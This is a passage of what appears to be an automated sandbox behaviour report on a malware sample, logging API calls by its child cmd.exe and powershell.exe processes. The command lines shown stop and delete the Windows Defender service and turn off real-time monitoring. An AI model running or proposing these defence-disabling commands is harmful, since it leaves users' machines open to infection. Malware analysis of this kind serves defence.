Environment	Set Environment String	name = =ExitCode, value = 00000001	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #17: cmd.exe

Information	Value
ID	#17
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c sc stop WinDefend
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:54, Reason: Child Process
Unmonitor	End Time: 00:00:57, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

Information	Value
PID	0xfd8
Parent PID	0xfac (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x FDC

Threads

Thread 0xfdc

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 1627-02-24 06:58:31 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10905343	1	Fn
System	Get Time	type = Performance Ctr, time = 12937850504	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a830000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\sc.exe, os_pid = 0x83c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #18: cmd.exe

Information	Value
ID	#18
File Name	c:\windows\system32\cmd.exe
Command Line	"C:\Windows\System32\cmd.exe" /c sc delete WinDefend
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:55, Reason: Child Process
Unmonitor	End Time: 00:00:57, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

Information	Value
PID	0xffc
Parent PID	0xfac (c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 818

Threads

Thread 0x818

Category	Operation	Information	Count	Logfile
System	Get Time	type = System Time, time = 1627-02-24 06:58:31 (UTC)	1	Fn
System	Get Time	type = Ticks, time = 10906014	1	Fn
System	Get Time	type = Performance Ctr, time = 13004619591	1	Fn
Module	Get Handle	module_name = c:\windows\system32\cmd.exe, base_address = 0x4a830000	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetThreadUILanguage, address_out = 0x76b624c2	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	1	Fn
File	Open	filename = STD_OUTPUT_HANDLE	3	Fn
File	Open	filename = STD_INPUT_HANDLE	2	Fn
Environment	Get Environment String	-	2	Fn Data
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE	1	Fn
Module	Get Filename	process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Environment	Get Environment String	name = PROMPT	1	Fn
Environment	Set Environment String	name = PROMPT, value = $P$G	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Get Environment String	name = COMSPEC, result_out = C:\Windows\system32\cmd.exe	1	Fn
Environment	Get Environment String	name = KEYS	1	Fn
File	Get Info	filename = C:\Windows\system32, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32, type = file_attributes	1	Fn
Environment	Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn
Environment	Get Environment String	-	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CopyFileExW, address_out = 0x76b4ac6c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x76b62732	1	Fn
Environment	Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\	1	Fn
Environment	Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Process	Create	process_name = C:\Windows\system32\sc.exe, os_pid = 0x8e4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL	1	Fn
Environment	Set Environment String	name = COPYCMD	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCode, value = 00000000	1	Fn
Environment	Get Environment String	-	1	Fn Data
Environment	Set Environment String	name = =ExitCodeAscii	1	Fn
Environment	Get Environment String	-	1	Fn Data
File	Open	filename = STD_OUTPUT_HANDLE	2	Fn
File	Open	filename = STD_INPUT_HANDLE	1	Fn

Process #19: powershell.exe

828

Information	Value
ID	#19
File Name	c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line	powershell Set-MpPreference -DisableRealtimeMonitoring $true
Initial Working Directory	C:\Windows\system32\
Monitor	Start Time: 00:00:55, Reason: Child Process
Unmonitor	End Time: 00:01:06, Reason: Self Terminated
Monitor Duration	00:00:10

OS Process Information

Information	Value
PID	0x81c
Parent PID	0xfc4 (c:\windows\system32\cmd.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	ZGW5TDPU\2XC7u663GxWc
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 114 0x 8CC 0x 8FC 0x 240 0x 908 0x 23C 0x 824 0x 820

Threads

Thread 0x114

604

Category	Operation	Information	Count	Logfile
System	Get Info	type = Operating System	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
User	Lookup Privilege	privilege = SeDebugPrivilege, luid = 20	1	Fn
Module	Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
System	Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Environment	Get Environment String	name = MshEnableTrace	3	Fn
File	Get Info	filename = C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	9	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	6	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
File	Create	filename = CONOUT$, desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE	1	Fn
System	Get Info	type = Operating System	1	Fn
Environment	Get Environment String	name = MshEnableTrace	12	Fn
Environment	Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_CURRENT_USER\Environment	1	Fn
Registry	Read Value	reg_name = HKEY_CURRENT_USER\Environment, value_name = PSMODULEPATH, type = REG_NONE	1	Fn
Environment	Set Environment String	name = PSMODULEPATH, value = C:\Users\2XC7u663GxWc\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 4096	3	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 3315	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 781, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
System	Get Info	type = Hardware Information	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 4096	41	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Environment	Get Environment String	name = MshEnableTrace	4	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096	17	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
